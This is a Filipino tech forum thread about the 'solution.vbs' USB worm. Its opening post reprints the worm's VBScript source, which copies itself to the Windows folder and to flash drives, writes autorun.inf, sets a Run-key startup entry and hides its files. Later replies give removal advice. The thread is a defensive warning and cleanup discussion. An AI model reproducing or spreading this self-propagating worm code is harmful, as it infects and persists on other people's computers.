solution.VBS virus script

[Siramiko]

warning
another virus nakita nkuha sa usb flash drive
post ko dito na kung sakali mavirus kayo nito alam nyu alaing registry ang binabago ng virus
dinelete kong ang ilang code para hindi na magamit kung sakaling copyahin

On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax, pug, pou

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "solution.vbs" Then
   wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
   scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\solution.vbs")

Set myFile = fso.CreateTextFile(win & "\solution.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\solution.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""



While (true)

   Set myDrives = fso.Drives
   For Each myFlashDrive In myDrives

      If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

         If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
            Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
            fAttr.Attributes=32
            fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
         End If
     
         Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
         auFile.write "[autorun]" & vbCrLf & "open=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Command=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Default=1"
         auFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
         fAttr.Attributes=39

         Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\solution.vbs", true)
         myFile.write scrText
         myFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\solution.vbs")
         fAttr.Attributes=39

      End If

   Next

   With wscr
      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
   End With

pug = fso.Deletefile("C:\WINDOWS\auto.vbs")


 


Wend

[7_SeVeN_7]

ginagawa ko dinedelete ko na lang yung file association ng VBS at VBE sa windows explorer

[Positron E+]

ginagawa ko dinedelete ko na lang yung file association ng VBS at VBE sa windows explorer

ganun rin ginawa ko. saka para maiwan ito idelete nyo yung autorun tapos sa VIEW option ng windows explorer niyo uncheck niyo mga hide na file para makita niyo yung mga nakahide na file sa use at sa hardisk,ingat lang sa pagdelete baka madelete boot.ini at iba pang system files

[Woots29]

delete process agad ang wscript.exe

tapus delete the vbs

then check ko policy editor para sa regstry enabling

tapus hahanapin ko sa regedit ung mga keys na nabago

[Dennis]

kapag nalagay sa registry at nakatago ang file ng virus kahit anong delete ay paulit-ulit parin yan na gagawa ng file. kasi nasa code niya yung na gumawa siya ng file. sa mga virus naman na nag-iinfect ng executable file kapag denilete mo yung main file at sa registry, kapag naipatakbo mo yung executable file na infected gagawa uli yan ng address sa registy ganun rin ng panibagong file

[orravan]

sir techno08 mayroon na bang step by step procedure how to permanently clear the solution.vbs

pc namin sa office then pc ko sa bahay both have the same problem
end process ko sa task manager then delete all entry sa regedit.

kaso the next time na isaksak ko ulit un flash drive eh bumabalik parin...
hope to hear from you o link me to other post.

thanks

[hardcore misery]

kailangan bang i-delete tong mga keys na to?


      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"

[Woots29]

yes kelangan

pero ung una lang na line

[hardcore misery]

tinignan ko na sa registry, wala na pala sa PC ko.hehe

[bluegirl]

na delete q yan using combo fix.. ewan q kung saan aq nakadownload nun dati.. para xang command prompt

[xeed]

i suggest to use this apps, freeware nmn xa. useful naman xa mtagal ko na xang gngmt, blocks all autorun, .vbs usb viruses, etc. here's the link:

hxxp://oldmcdonald.wordpress.com/
http://oldmcdonald.wordpress.com/

[bluegirl]

dati combofix yung naka delete sa .vbs q na virus yung may SSG virus

[Karl80]

haay naku lalong kumakalat at na-modify ang vbs worm kapag pino-post ang source code! hwag kayo mag-post ng source code, kung pwede lang ha.

tama ang mga post na i-kill ang wscript.exe, example sa start/run/open type nyo lang taskkill /im wcript.exe /f

[theeye23]

haay naku lalong kumakalat at na-modify ang vbs worm kapag pino-post ang source code! hwag kayo mag-post ng source code, kung pwede lang ha.

tama ang mga post na i-kill ang wscript.exe, example sa start/run/open type nyo lang taskkill /im wcript.exe /f

This one is good, if you suspected that you are infected with a .VBS or .JS worm, the first thing you should do is kill the WSCRIPT.EXE on process using either the Task Manager or taskkill command in Start Menu + Run. Then remove the startup entries of the worm using MSCONFIG.

But if you do not feel the manual removal then I suggest you use the Noob Killer by leerz or Ampaw Smasher X by sir t68kv to remove VBS or JS worms.

[de PatAtas]

' avenger din...pang alis ng VBS...virus

[jacks]

SCBing.........

[9 Volts]

patulong naman po sa trojan ng comp ko, di ko maalala eh, ano po magaling na pagtanggal nun,

eto na gamit ko ayaw pa rin matanggal.
kaspersky
ASO system protector
Spybot S&D
Windows def

di pa rin nila madetect.. hayz

[jacks]

Post mo symptoms nya. Ano ginagawa, pero siguro sa ibang thread na.

[9 Volts]

Trojan-Dropper.vb.zk

yan po yung nag eexecute pag idle yung comp. ko. d ko matanggal.. panu po?

patulong mga masters..

[theeye23]

Trojan-Dropper.vb.zk

yan po yung nag eexecute pag idle yung comp. ko. d ko matanggal.. panu po?

patulong mga masters..

Try to scan in Safe Mode.